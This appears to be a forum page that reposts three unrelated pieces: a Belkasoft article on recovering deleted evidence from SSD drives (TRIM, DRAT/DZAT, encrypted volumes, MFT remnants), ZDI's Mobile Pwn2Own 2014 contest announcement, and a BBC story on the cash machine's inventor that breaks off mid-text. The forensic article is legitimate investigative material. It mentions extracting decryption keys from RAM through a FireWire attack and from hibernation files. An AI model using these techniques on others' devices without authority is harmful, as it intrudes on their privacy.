So let’s say we know that the suspect erased important evidence or formatted the disk just minutes before arrest. The SSD drive has been obtained and is available for imaging. What exactly should an investigator expect to obtain from this SSD drive? Reported experience in recovering information from SSD drives varies greatly among SSD users. “I ran a test on my SSD drive, deleting 1000 files and running a data recovery tool 5 minutes after. The tool discovered several hundred files, but an attempt to recover returned a bunch of empty files filled with zeroes”, said one Belkasoft customer. “We used Belkasoft Evidence Center to analyze an SSD drive obtained from the suspect’s laptop. We were able to recover 80% of deleted files several hours after they’d been deleted”, said another Belkasoft user.

Figure: Carving options in Belkasoft Evidence Center. For the experiment, we set “Unallocated clusters only” and the SSD drive connected as physical drive 0.

Why such a big inconsistency in user experiences?
The answer lies in the way different SSD drives handle trimmed data pages. Some SSD drives implement what is called Deterministic Read After Trim (DRAT) or Deterministic Zeroes After Trim (DZAT), returning all zeroes immediately after the TRIM command releases a certain data block, while other drives do not implement this protocol and will return the original data until it is physically erased by the garbage collection algorithm. Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA specification for a long time. Linux users can verify whether their SSD drive uses DRAT or DZAT by issuing the hdparm -I command, which reports whether the drive supports TRIM and performs “Deterministic Read After Trim”. Example:

$ sudo hdparm -I /dev/sda | grep -i trim
* Data Set Management TRIM supported (limit 1 block)
* Deterministic read data after TRIM

The adoption of DRAT has been steadily increasing among SSD manufacturers. Two years ago we often saw reports on SSD drives both with and without DRAT support. In 2014, the majority of new models come equipped with DRAT or DZAT. There are three different types of TRIM defined in the SATA protocol and implemented in different SSD drives.

Non-deterministic TRIM: each read command after a TRIM may return different data.

Deterministic TRIM (DRAT): all read commands after a TRIM shall return the same data, i.e. become determinate. Note that this level of TRIM does not necessarily return all zeroes when trimmed pages are accessed. Instead, DRAT guarantees that the data returned when accessing a trimmed page will be the same (“determined”) before and after the affected page has been processed by the garbage collection algorithm, and until new data is written to the page. As a result, the data returned by SSD drives supporting DRAT (as opposed to DZAT) can be all zeroes or other words of data, or it could be the original pre-trim data stored in that logical page.
The essential point here is that the values read from a trimmed logical page do not change from the moment the TRIM command is issued until the moment new data is written to that logical page.

Deterministic Read Zero After Trim (DZAT): all read commands after a TRIM shall return zeroes until new data is written to the page.

As we can see, in some cases the SSD will return non-original data (all zeroes, all ones, or some other non-original data) not because the physical blocks were cleaned immediately following the TRIM command, but because the SSD controller reports that there is no valid data held at the trimmed address on the logical level previously associated with the trimmed physical block. If, however, one could read the data directly from the physical blocks mapped to the logical blocks that have been trimmed, then the original data could be obtained from those physical blocks until they are physically erased by the garbage collector. Apparently, there is no way to address the physical data blocks via the standard ATA command set; however, the disk manufacturer could most probably do this in their own lab. As a result, sending a trimmed SSD disk to the manufacturer for recovery may be a viable proposition where some extremely important evidence is concerned. Notably, DRAT cannot be leveraged from Windows, as NTFS does not allow applications to read the trimmed data.

Acquiring Evidence from SSD Drives

So far, the only practical way of obtaining evidence from an SSD drive remains traditional imaging (with a dedicated hardware/software combination), followed by analysis with an evidence discovery tool (such as Belkasoft Evidence Center, http://forensic.belkasoft.com/en/bec/en/evidence_center.asp). We now know more about the expected outcome when analyzing an SSD drive.
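The three read-after-trim behaviours can be summarized with a toy model (purely illustrative; real controllers implement this in firmware, not in host software, and the class below is our own invention):

```python
import os

PAGE_SIZE = 4096

class LogicalPage:
    """Toy model of one logical page under the three SATA TRIM
    behaviours: 'non-deterministic', 'DRAT' or 'DZAT'."""

    def __init__(self, data: bytes, behaviour: str):
        self.data = data
        self.behaviour = behaviour
        self.trimmed = False
        self._fixed = None

    def trim(self):
        self.trimmed = True
        if self.behaviour == "DRAT":
            # DRAT only promises a STABLE value; it may be zeroes, some
            # other pattern, or even the original pre-trim data.
            self._fixed = bytes([os.urandom(1)[0]]) * PAGE_SIZE

    def read(self) -> bytes:
        if not self.trimmed:
            return self.data
        if self.behaviour == "DZAT":
            return b"\x00" * PAGE_SIZE   # always zeroes after TRIM
        if self.behaviour == "DRAT":
            return self._fixed           # same value on every read
        return os.urandom(PAGE_SIZE)     # anything, possibly old data
```

This is why the two Belkasoft users quoted above saw such different results: a DZAT drive hands the carver zero-filled pages minutes after deletion, while a drive without deterministic reads keeps returning original data until garbage collection catches up.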
There are generally two scenarios: either the SSD contains only existing data (files and folders, traces of deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains the full information (destroyed evidence still available in unallocated disk space). Today, we can predict which scenario will apply by investigating the conditions in which the SSD drive has been used.

Scenario 1: Existing Files Only

In this scenario, the SSD may contain some files and folders, but free disk space will be truly empty (as in “filled with zero data”). As a result, carving free disk space will return no information or only traces of information, while carving the entire disk space will only return data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the only practical way of locating moved or hidden evidence (e.g. renamed history files, or documents stored in the Windows\System32 folder and renamed to .SYS or .DLL). Practically speaking, the same acquisition and analysis methods should be applied to an SSD drive as if we were analyzing a traditional magnetic disk. Granted, we’ll recover little or no destroyed evidence, but any evidence contained in existing files, including e.g. deleted records from SQLite databases (used, for example, in Skype histories), can still be recovered (http://forensic.belkasoft.com/en/recover-destroyed-sqlite-evidence-skype-and-iphone-logs).

Scenario 2: Full Disk Content

In the second scenario, the SSD disk will still contain the complete set of information – just like traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis stage, including file carving. Why would an SSD drive NOT destroy evidence as a result of routine garbage collection? The garbage collection algorithm erasing the content of released data blocks does not run if the TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the chain.
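One quick heuristic for telling the two scenarios apart is to sample sectors of a raw image and measure how much reads back as zeroes. The sketch below is our own illustration (the function name and sampling rate are arbitrary choices, not part of any forensic product):

```python
def zero_sector_ratio(image_path: str, sector_size: int = 512,
                      sample_every: int = 2048) -> float:
    """Sample every Nth sector of a raw image and return the fraction
    that is entirely zero-filled. A ratio close to 1.0 over free space
    hints at Scenario 1 (trimmed and garbage-collected); a low ratio
    hints at Scenario 2 (content still present)."""
    zero = bytes(sector_size)
    zeroed = total = 0
    with open(image_path, "rb") as img:
        while True:
            sector = img.read(sector_size)
            if len(sector) < sector_size:
                break
            total += 1
            if sector == zero:
                zeroed += 1
            # Skip ahead to the next sampled sector.
            img.seek(sector_size * (sample_every - 1), 1)
    return zeroed / total if total else 0.0
```

Run against the unallocated region of an image, a result near 1.0 matches the “bunch of empty files filled with zeroes” experience quoted earlier.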
Let’s see in which cases this could happen.

Figure: More than 1000 items were carved out of unallocated sectors of an SSD hard drive – in particular, Internet Explorer history, Skype conversations, SQLite databases, system files and other forensically important types of data.

Operating System Support

TRIM is a property of the operating system as much as it is a property of an SSD device. Older file systems do not support TRIM. Wikipedia (http://en.wikipedia.org/wiki/Trim_(computing)) has a comprehensive table detailing operating system support for the TRIM command.

[TABLE]
[TR]
[TD]Operating System[/TD]
[TD]Supported since[/TD]
[TD]Notes[/TD]
[/TR]
[TR]
[TD]DragonFly BSD[/TD]
[TD]May 2011[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]FreeBSD[/TD]
[TD]8.1 – July 2010[/TD]
[TD]Support was added at the block device layer in 8.1. File system support was added in FreeBSD 8.3 and FreeBSD 9, beginning with UFS. ZFS trimming support was added in FreeBSD 9.2. FreeBSD 10 will support trimming on software RAID configurations.[/TD]
[/TR]
[TR]
[TD]Linux[/TD]
[TD]2.6.28 – 25 December 2008[/TD]
[TD]Initial support for discard operations was added for FTL NAND flash devices in 2.6.28. Support for the ATA Trim command was added in 2.6.33. Not all file systems make use of Trim. Among the file systems that can issue Trim requests automatically are Ext4, Btrfs, FAT, GFS2 and XFS; however, this is disabled by default due to performance concerns, and can be enabled by setting the “discard” mount option. Ext3, NILFS2 and OCFS2 offer ioctls to perform offline trimming.
The Trim specification calls for supporting a list of trim ranges, but as of kernel 3.0 trim is only invoked with a single range, which is slower.[/TD]
[/TR]
[TR]
[TD]Mac OS X[/TD]
[TD]10.6.8 – 23 June 2011[/TD]
[TD]Although the AHCI block device driver gained the ability to display whether a device supports the Trim operation in 10.6.6 (10J3210), the functionality itself remained inaccessible until 10.6.8, when the Trim operation was exposed via the IOStorageFamily and file system (HFS+) support was added. Some online forums state that Mac OS X only supports Trim for Apple-branded SSDs; third-party utilities are available to enable it for other brands.[/TD]
[/TR]
[TR]
[TD]Microsoft Windows[/TD]
[TD]NT 6.1 (Windows 7 and Windows Server 2008 R2) – October 2009[/TD]
[TD]Windows 7 only supports trim for ordinary (SATA) drives and does not support this command for PCI Express SSDs, which are a different type of device, even if the device itself would accept the command. It is confirmed that with native Microsoft drivers the Trim command works in AHCI and legacy IDE/ATA mode.[/TD]
[/TR]
[TR]
[TD]OpenSolaris[/TD]
[TD]July 2010[/TD]
[TD][/TD]
[/TR]
[TR]
[TD]Android[/TD]
[TD]4.3 – 24 July 2013[/TD]
[TD][/TD]
[/TR]
[/TABLE]

Old Versions of Windows

As shown in the table above, TRIM support was only added in Windows 7. Obviously, TRIM is also supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive obtained from a system running one of the older versions of Windows, it is possible to obtain the full content of the device. Possible exception: TRIM-like behavior can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).

Mac OS X

Mac OS X has supported the TRIM command for Apple-supplied SSD drives since version 10.6.8. Older builds of Mac OS X do not support TRIM.
Notably, user-installed SSD drives not supplied by Apple itself are excluded from TRIM support.

Old or Basic SSD Hardware

Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives, as well as the SSD-like flash media used in basic tablets and sub-notes (such as certain models of the ASUS Eee), do not support the TRIM command. For example, Intel started manufacturing TRIM-enabled SSD drives at a drive lithography of 34nm (G2); their 50nm SSDs do not have TRIM support. In reality, few SSD drives without TRIM have survived that long. Many entry-level sub-notebooks use flash-based storage, often mislabeled as “SSD”, that does not feature garbage collection or support the TRIM protocol.

(Windows) File Systems Other than NTFS

TRIM is a feature of the file system as much as a property of an SSD drive. At this time, Windows only supports TRIM on NTFS-formatted partitions. Volumes formatted with FAT, FAT32 and exFAT are excluded. Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by trying to interpret the file system, attempting to erase dirty blocks not referenced from the file system. This approach, when enabled, only works for the FAT file system, since it is a published spec. (http://www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChristiansen_ATA_TrimDeleteNotification_Windows7.pdf)

External drives, USB enclosures and NAS

The TRIM command is fully supported over the SATA interface, including the eSATA extension, as well as over SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure or installed in most models of NAS devices, the TRIM command will not be communicated via the unsupported interface. There is a notable exception.
Some NAS manufacturers are starting to recognize the demand for units with the ultra-high performance, low power consumption and noise-free operation provided by SSD drives, slowly adopting TRIM in some of their models. At the time of this writing, of all manufacturers only Synology appears to support TRIM, in a few select models of NAS devices and SSD drives. Here is a quote from the Synology Web site (https://www.synology.com/en-uk/support/faq/591): SSD TRIM improves the read and write performance of volumes created on SSDs, increasing efficiency as well as extending the lifetime of your SSDs. See the list below for verified SSDs with TRIM support.

· You may customize a schedule to choose when the system will perform TRIM.
· SSD TRIM is not available when an SHA cluster exists.
· TRIM cannot be enabled on iSCSI LUN.
· The TRIM feature under RAID 5 and 6 configurations can only be enabled on SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturers for details on DZAT support.

PCI Express SSDs

Interestingly, the TRIM command is not natively supported by any version of Windows for the many high-performance SSD drives occupying a PCI Express slot. Do not confuse PCI Express SSDs with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like behavior can be enabled via certain third-party solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).

RAID

The TRIM command is not yet supported in RAID configurations (with a few rare exceptions), so SSD drives working as part of a RAID array can be analyzed. A notable exception to this rule is a modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87 or Z68) accompanied by the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of the BIOS. In these configurations, TRIM can be enabled.
Corrupted Data

Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted; they simply become invisible or inaccessible to the operating system. Many commercially available data recovery tools (e.g., Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives.

Bugs in SSD Firmware

Firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. Just to give an example, the OCZ Agility 3 120 GB shipped with buggy firmware v2.09, in which TRIM did not work. Firmware v2.15 fixed TRIM behavior, while v2.22 introduced issues with data loss on wake-up after sleep; firmware v2.25 then fixed that but disrupted TRIM operation again (information taken from http://www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware.

Bugs in SSD Over-Provisioning

SSD over-provisioning is one of the many wear-leveling mechanisms intended to increase SSD life span. Some areas on the disk are reserved at the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called the over-provisioning area (OP area) and can be used by SSD controllers when a fresh block is required for a write operation. A dirty block will then enter the OP pool and will be erased by the garbage collection mechanism during the drive’s idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example, revealing trimmed data after a reboot or power-off.
Solid-state drives constantly remap data, and after a TRIM they allocate addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after the TRIM. Obviously, the drive has not had the time to actually clean the old data from that block. Instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases compressed data, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable. Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right on the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users see the old data back as if it had never been deleted. Apparently, because of the mapping issue, the new pointers would not work as they should, due to a bug in the drive’s firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives.

SSD Shadiness: Manufacturers Bait-and-Switch

When choosing an SSD drive, customers tend to read online reviews. Normally, when a new drive is released, it gets reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive’s specs without changing the model number? In this case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers.
According to ExtremeTech (http://www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting good reviews. In this case, the two manufacturers launched their SSDs with one hardware specification, then quietly changed the hardware configuration after the reviews had gone out. So what’s in it for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a different, SandForce-based controller known for its less-than-perfect implementation of garbage collection, leaving data on the disk for a long time after it has been deleted.

Small Files: Slack Space

Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the world of SSDs, the term “slack space” takes on a new meaning. Rather than being a matter of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of the minimum writeable and minimum erasable blocks on the physical level. Micron, the manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https://www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf

In SSD terms, a page is the smallest unit of storage that can be written to. The typical page size of today’s SSDs is 4 KB or 8 KB. A block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages.
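The resulting erase-block sizes follow directly from this geometry: the smallest erasable unit is simply the page size multiplied by the number of pages per block. A one-line check of the arithmetic:

```python
def erase_block_kb(page_kb: int, pages_per_block: int) -> int:
    """Smallest physically erasable unit, in KB."""
    return page_kb * pages_per_block

# The two extremes of the geometry described above:
assert erase_block_kb(4, 128) == 512     # 4 KB pages * 128 = 512 KB
assert erase_block_kb(8, 256) == 2048    # 8 KB pages * 256 = 2 MB
```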
As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contains pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) smaller than 512 KB or 2 MB, depending on the SSD model, may not be affected by the TRIM command and may still be forensically recoverable. However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on the physical level.

Small Files: MFT Attributes

Most hard drives used in Windows systems use NTFS as their file system. NTFS stores information about files and directories in the Master File Table (MFT). The MFT contains information about all files and directories listed in the file system; in other words, each file or directory has at least one record in the MFT. In terms of computer forensics, one particular feature of the MFT is of great interest. Unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving reading performance and decreasing wasted disk space (the “slack” space referenced in the previous chapter). As a result, small files being deleted are not going anywhere: their entire content continues to reside in the file system. The MFT records are not emptied and are not affected by the TRIM command.
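A minimal sketch of how such resident content can be pulled out of a raw MFT record is shown below (simplified and ours, not any product's routine: it ignores NTFS fixup arrays and alternate data streams, and returns only the first $DATA attribute):

```python
import struct
from typing import Optional

def resident_data(record: bytes) -> Optional[bytes]:
    """Return the content of a resident $DATA attribute (type 0x80)
    from a raw 1024-byte NTFS MFT record, or None if the record has
    no resident $DATA. Fixup values are not applied (simplified)."""
    if record[:4] != b"FILE":
        return None
    # Offset to the first attribute is a 16-bit value at byte 20.
    offset = struct.unpack_from("<H", record, 20)[0]
    while offset + 24 <= len(record):
        attr_type, attr_len = struct.unpack_from("<II", record, offset)
        if attr_type == 0xFFFFFFFF or attr_len == 0:
            return None                    # end-of-attributes marker
        if attr_type == 0x80:              # $DATA attribute
            if record[offset + 8]:         # non-resident flag set
                return None                # content lives in clusters
            size = struct.unpack_from("<I", record, offset + 16)[0]
            start = offset + struct.unpack_from("<H", record, offset + 20)[0]
            return record[start:start + size]
        offset += attr_len
    return None
```

Carving a disk image for the b"FILE" record signature and feeding each hit to a routine like this is essentially how tiny deleted files survive in the MFT even after a TRIM.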
This in turn allows investigators to recover such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small: the maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purposes of digital forensics.

Encrypted Volumes

Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover, as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or the binary decryption keys for the volume. TRIM on encrypted volumes is a huge topic, well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around, and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let’s try assembling a brief summary of some of the most popular encryption options.

Apple FileVault 2

Introduced with Apple OS X “Lion”, FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption only on HFS+ volumes (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on SSD drives. This has the expected security implication of free sectors/blocks being revealed.

Microsoft BitLocker

Microsoft has its own built-in version of volume-level encryption, called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes.
TrueCrypt

TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The company issued several security warnings in relation to wear-leveling security issues and the TRIM command revealing information about which blocks are in use and which are not (http://www.truecrypt.org/docs/trim-operation and http://www.truecrypt.org/docs/wear-leveling).

PGP Whole Disk Encryption

By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering the wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command-line option: --fast (http://www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of the file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume.

More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes.

Forensic Acquisition: The Right Way to Do It

The right way to acquire a PC with a crypto container can be described with the following sentence: "If it's running, don't turn it off. If it's off, don't turn it on." Indeed, the original decryption keys are cached in the computer's memory and can be extracted from a live RAM dump obtained from a running computer, for example by performing a FireWire attack. These keys can also be contained in page files and hibernation files. Tools such as Passware can extract decryption keys from memory dumps and page/hibernation files, decrypting the content of encrypted volumes.

Reality Steps In: Why Real SSDs are Often Recoverable

In reality, things may look different from what was just described above in such great technical detail.
In our lab, we've seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as the ASUS Eee or ASUS Zenbook. Why is it so? There are several reasons, mainly cost savings and miniaturization, but sometimes it is simply over-engineering.

Inexpensive laptops often use flash-based storage and call it an SSD as a marketing ploy. In fact, in most cases it is just slow, inexpensive and fairly small flash-based storage having little in common with real SSD drives.

Ultrabooks and sub-notebooks have no space to fit a full-size SSD drive. They used to use SSD drives in the PCIe form factor (as opposed to M.2 or mSATA) which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives.

SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on the SSD drive for a long time.

The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remain accessible for a long time, and can be successfully carved from a promptly captured disk image.

On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, "RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!" (http://www.acer.com/aspires7/en_US/). This looks like over-engineering.
As TRIM is not enabled on RAID SSDs in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly why TRIM was invented in the first place). For us, this means that any data deleted from these storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the use of the right chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied by the correct drivers (the latest RST driver from Intel allegedly works) can in turn re-enable TRIM. However, we have yet to see how this works in reality (http://www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too).

Conclusion

SSD forensics remains different. SSDs self-destroy court evidence, making it difficult to extract deleted files, while recovering destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, however, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations.

There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less money. That aside, compressing SSD controllers appear to be becoming the norm, making off-chip acquisition impractical and killing all sorts of DIY SSD acquisition hardware.

More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in the SATA standard a long time ago. This in turn means that a quick format is likely to instantly render deleted evidence inaccessible to standard read operations, even if the drive is acquired with forensic write-blocking imaging hardware immediately after.

SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling.
However, because of the increased complexity, even seasoned manufacturers have released SSD drives with buggy firmware, causing improper operation of the TRIM and garbage collection functionality. Considering just how complex today's SSD drives have become, it is surprising these things work, even occasionally. The playing field is constantly changing, but what we know now about SSD forensics gives hope.

About the authors

Yuri Gubanov is a renowned computer forensics expert. He is a frequent speaker at industry-known conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft. Besides, Yuri is a senior lecturer at St. Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn

Oleg Afonin is an expert and consultant in computer forensics. You can contact the authors via research@belkasoft.com

About Belkasoft Research

Belkasoft Research is based in St. Petersburg State University. The company performs non-commercial research and scientific activities.

Sursa: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles
-
Admin | September 4, 2014

HP Security Research's Zero Day Initiative (ZDI) invites you to join us for the third annual Mobile Pwn2Own competition, to be held this year on November 12-13 at the PacSec Applied Security Conference in Tokyo, Japan. We're looking forward to rewarding the world's top researchers for demonstrating and disclosing their stealthy attacks on mobile devices, and we're delighted that our friends at Google's Android Security Team and BlackBerry are joining us again as sponsors. This year, we're upping the prize pool to $425,000, rearranging the prize package, and introducing new devices in order to attract the best and brightest researchers and enhance security for the most popular mobile platforms.

In their sights – the mobile attack surface

In case you're not familiar, Mobile Pwn2Own is ZDI's annual contest that rewards security researchers for highlighting security vulnerabilities on mobile platforms. (You may have heard of its sister contest for other platforms, Pwn2Own, which was held in March this year at CanSecWest.) With the near-ubiquity of mobile devices, vulnerabilities on these platforms are becoming increasingly coveted and are actively and vigorously hunted by criminals for exploitation. This contest helps to harden these devices by finding vulnerabilities first and sharing that research with mobile device and platform vendors.

This year's bounty

The prize pool is rising again, with HP and its sponsors offering over $425,000 (USD) in cash and prizes to researchers who successfully compromise selected mobile targets from particular categories, which is $125,000 more than last year's contest. Contestants are judged on their ability to uncover new vulnerabilities and to develop cutting-edge exploit techniques that can be used to compromise some of the world's most popular mobile devices.
The prize categories are:

- Mobile Web Browser ($50,000)
- Mobile Application/Operating System ($50,000): reachable by a remote attacker (including through the browser)
- Short Distance ($75,000): either Bluetooth, Wi-Fi, or Near Field Communication (NFC)
- Messaging Services ($100,000): either Short Message Service (SMS), Multimedia Messaging Service (MMS), or Commercial Mobile Alert System (CMAS)
- Baseband ($150,000): limited to Apple iPhone, Google Nexus and BlackBerry Z30 only

Contestants can select the target they want to compromise during pre-registration. The details, including exact OS version, applications, firmware and model numbers, will be coordinated after pre-registration. The following targets are available for selection:

- Amazon Fire Phone
- Apple iPhone 5s
- Apple iPad Mini with Retina Display
- BlackBerry Z30
- Google Nexus 5
- Google Nexus 7
- Nokia Lumia 1520
- Samsung Galaxy S5

How do I enter?

The contest is open to all registrants of the PacSec 2014 conference (as long as you meet our rather inclusive eligibility requirements). Start by reviewing the contest rules, here. Next, if you don't already have a free ZDI researcher account, you need to sign up here. When you're all signed up as a ZDI researcher, it's simply a matter of contacting us to register for the contest.

More importantly, how do I win?

Be the first to compromise a selected target in one of the categories using a previously unknown vulnerability (one that has not been disclosed to the affected vendor). You've got 30 minutes to complete your attempt. When you've successfully demonstrated your exploit and 'pwned' the targeted device, you need to provide ZDI with a fully functioning exploit and a whitepaper detailing all of the vulnerabilities and techniques utilized in your attack. A successful attack against these devices must require no user interaction beyond the action required to browse to the malicious content. As always, the initial vulnerability used in the attack must be in the registered category.
The contestant must demonstrate remote code execution by bypassing sandboxes (if applicable) and exfiltrating sensitive information. To avoid interfering with licensed carrier networks, all RF attacks must be completed within the provided RF isolation enclosure. The vulnerabilities utilized in the attack must be unpublished zero days. As always, ZDI reserves the right to determine what constitutes a successful attack.

The vulnerabilities and exploit techniques discovered by the winning researchers will be disclosed to the affected vendors. If the affected vendor is at the conference, we can even arrange to hand over the vulnerability details onsite for the fastest possible remediation. If you missed it above, the full contest rules are here.

Want to know more? We'll be tweeting regular updates and news on Mobile Pwn2Own up to and during the contest. You can follow us @thezdi on Twitter or search for the hash tag #pwn2own. Visit pwn2own.com for updates throughout the contest and to check out content from past contests, including photos, videos and more. For press inquiries, please contact Heather Goudey heather.goudey@hp.com

Sursa: Mobile Pwn2Own Tokyo 2014 - PWN2OWN
-
The man who invented the cash machine

By Brian Milligan, Business reporter, BBC News

"They're clever scoundrels," fumes John Shepherd-Barron at his remote farmhouse in northern Scotland. He is referring to the seals which are raiding his salmon farm and stealing fish.

[Image caption: John Shepherd-Barron's cash machine first appeared in 1967]

"I invented a device to scare them off by playing the sound of killer whales, but it's ended up only attracting them more." But failure with this device is in contrast to the success of his first and greatest invention: the cash machine.

The world's first ATM was installed in a branch of Barclays in Enfield, north London, 40 years ago this week. Reg Varney, from the television series On the Buses, was the first to withdraw cash.

Inspiration had struck Mr Shepherd-Barron, now 82, while he was in the bath. "It struck me there must be a way I could get my own money, anywhere in the world or the UK. I hit upon the idea of a chocolate bar dispenser, but replacing chocolate with cash."

Barclays was convinced immediately. Over a pink gin, the then chief executive signed a hurried contract with Mr Shepherd-Barron, who at the time worked for the printing firm De La Rue.

Teething troubles

Plastic cards had not been invented, so Mr Shepherd-Barron's machine used cheques that were impregnated with carbon 14, a mildly radioactive substance. The machine detected it, then matched the cheque against a Pin number.

[Image caption: Reg Varney was the first to use an ATM]

However, Mr Shepherd-Barron denies there were any health concerns: "I later worked out you would have to eat 136,000 such cheques for it to have any effect on you." The machine paid out a maximum of £10 a time. "But that was regarded then as quite enough for a wild weekend," he says.
To start with, not everything went smoothly. The first machines were vandalised, and one that was installed in Zurich in Switzerland began to malfunction mysteriously. It was later discovered that the wires from two intersecting tramlines nearby were sparking and interfering with the mechanism.

One by-product of inventing the first cash machine was the concept of the Pin number. Mr Shepherd-Barron came up with the idea when he realised that he could remember his six-figure army number. But he decided to check that with his wife, Caroline. "Over the kitchen table, she said she could only remember four figures, so because of her, four figures became the world standard," he laughs.

End of cash?

Customers using the cash machine at Barclays in Enfield High Street are mostly unaware of its historical significance. A small plaque was placed there on the 25th anniversary, but few people notice it. Given that there are now more than 1.6 million cash machines worldwide, it is a classic case of British understatement.

